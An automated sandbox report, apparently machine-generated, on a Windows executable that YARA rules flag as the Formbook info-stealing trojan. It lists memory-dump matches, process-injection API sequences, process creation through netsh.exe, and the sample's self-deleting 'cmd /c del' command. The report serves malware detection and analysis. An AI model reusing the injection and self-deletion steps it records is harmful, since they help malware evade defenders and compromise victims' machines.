                Source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Formbook_1112e116, author: unknown
                Source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE; matched rule: autogenerated rule brought to you by yara-signator, author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE; matched rule: detect Formbook in memory, author: JPCERT/CC Incident Response Group
                Source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Formbook_1112e116, author: unknown
                Source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE; matched rule: autogenerated rule brought to you by yara-signator, author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE; matched rule: detect Formbook in memory, author: JPCERT/CC Incident Response Group
                Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Formbook_1112e116, author: unknown
                Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator, author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: detect Formbook in memory, author: JPCERT/CC Incident Response Group
                Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Formbook_1112e116, author: unknown
                Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator, author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; matched rule: detect Formbook in memory, author: JPCERT/CC Incident Response Group
                Source: 00000007.00000002.4452293523.000000000E4F2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Formbook_772cc62d, author: unknown
                Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Formbook_1112e116, author: unknown
                Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator, author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: detect Formbook in memory, author: JPCERT/CC Incident Response Group
                Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Formbook_1112e116, author: unknown
                Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator, author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; matched rule: detect Formbook in memory, author: JPCERT/CC Incident Response Group
                Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Formbook_1112e116, author: unknown
                Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator, author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; matched rule: detect Formbook in memory, author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: hOe2JrpIAE.exe PID: 4952, type: MEMORYSTR; matched rule: Windows_Trojan_Formbook_1112e116, author: unknown
                Source: Process Memory Space: hOe2JrpIAE.exe PID: 2796, type: MEMORYSTR; matched rule: Windows_Trojan_Formbook_1112e116, author: unknown
                Source: Process Memory Space: netsh.exe PID: 5712, type: MEMORYSTR; matched rule: Windows_Trojan_Formbook_1112e116, author: unknown
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D039B0 NtGetContextThread,8_2_03D039B0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D03D70 NtOpenThread,8_2_03D03D70
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D03D10 NtOpenProcessToken,8_2_03D03D10
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030CA360 NtCreateFile,8_2_030CA360
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030CA410 NtReadFile,8_2_030CA410
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030CA490 NtClose,8_2_030CA490
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030CA40E NtReadFile,8_2_030CA40E
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03AD9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,8_2_03AD9BAF
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03ADA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,8_2_03ADA036
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03AD9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_03AD9BB2
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03ADA042 NtQueryInformationProcess,8_2_03ADA042
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: String function: 011BEA12 appears 86 times
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: String function: 01197E54 appears 111 times
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: String function: 0113B970 appears 280 times
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: String function: 011CF290 appears 105 times
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: String function: 01185130 appears 58 times
                Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03D17E54 appears 111 times
                Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03D3EA12 appears 86 times
                Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03CBB970 appears 280 times
                Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03D4F290 appears 105 times
                Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03D05130 appears 58 times
Source: hOe2JrpIAE.exe | Static PE information: invalid certificate
Source: hOe2JrpIAE.exe, 00000000.00000002.2007654678.0000000007420000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs hOe2JrpIAE.exe
Source: hOe2JrpIAE.exe, 00000000.00000002.2004466042.00000000011AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs hOe2JrpIAE.exe
Source: hOe2JrpIAE.exe, 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs hOe2JrpIAE.exe
Source: hOe2JrpIAE.exe, 00000000.00000000.1983396250.0000000000BA4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameXUhH.exeX vs hOe2JrpIAE.exe
Source: hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B46000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamenetsh.exej% vs hOe2JrpIAE.exe
Source: hOe2JrpIAE.exe, 00000006.00000002.2052100186.000000000147C000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamenetsh.exej% vs hOe2JrpIAE.exe
Source: hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamenetsh.exej% vs hOe2JrpIAE.exe
Source: hOe2JrpIAE.exe, 00000006.00000002.2051357395.000000000123D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs hOe2JrpIAE.exe
Source: hOe2JrpIAE.exe | Binary or memory string: OriginalFilenameXUhH.exeX vs hOe2JrpIAE.exe
Source: hOe2JrpIAE.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4452293523.000000000E4F2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: hOe2JrpIAE.exe PID: 4952, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: hOe2JrpIAE.exe PID: 2796, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: netsh.exe PID: 5712, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: hOe2JrpIAE.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.hOe2JrpIAE.exe.7140000.12.raw.unpack, XG.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hOe2JrpIAE.exe.7140000.12.raw.unpack, XG.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack, OV.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack, OV.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack, OV.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack, OV.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.raw.unpack, XG.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.raw.unpack, XG.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, jLW4CR6YqLFnTWAfMo.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, XfJx19P9NihkSJyVVW.cs | Security API names: _0020.SetAccessControl
Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, XfJx19P9NihkSJyVVW.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, XfJx19P9NihkSJyVVW.cs | Security API names: _0020.AddAccessRule
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, XfJx19P9NihkSJyVVW.cs | Security API names: _0020.SetAccessControl
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, XfJx19P9NihkSJyVVW.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, XfJx19P9NihkSJyVVW.cs | Security API names: _0020.AddAccessRule
Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, jLW4CR6YqLFnTWAfMo.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, XfJx19P9NihkSJyVVW.cs | Security API names: _0020.SetAccessControl
Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, XfJx19P9NihkSJyVVW.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, XfJx19P9NihkSJyVVW.cs | Security API names: _0020.AddAccessRule
Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, jLW4CR6YqLFnTWAfMo.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@14/1@12/5
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_01087F40 DisplayMessageM,FormatMessageW,GetLastError,GetStdHandle,LocalFree, | 8_2_01087F40
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_01088D48 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysAllocString,SysAllocString,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,CoUninitialize, | 8_2_01088D48
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hOe2JrpIAE.exe.log
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
Source: hOe2JrpIAE.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: hOe2JrpIAE.exe | ReversingLabs: Detection: 68%
Source: unknown | Process created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Process created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Process created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Process created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Process created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hOe2JrpIAE.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.internal.shell.broker.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: hOe2JrpIAE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: hOe2JrpIAE.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: hOe2JrpIAE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: XUhH.pdb source: hOe2JrpIAE.exe
                Source: Binary string: XUhH.pdbSHA256 source: hOe2JrpIAE.exe
                Source: Binary string: netsh.pdb source: hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2052100186.0000000001460000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000002.4441556154.0000000001080000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: netsh.pdbGCTL source: hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2052100186.0000000001460000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.4441556154.0000000001080000.00000040.80000000.00040000.00000000.sdmp
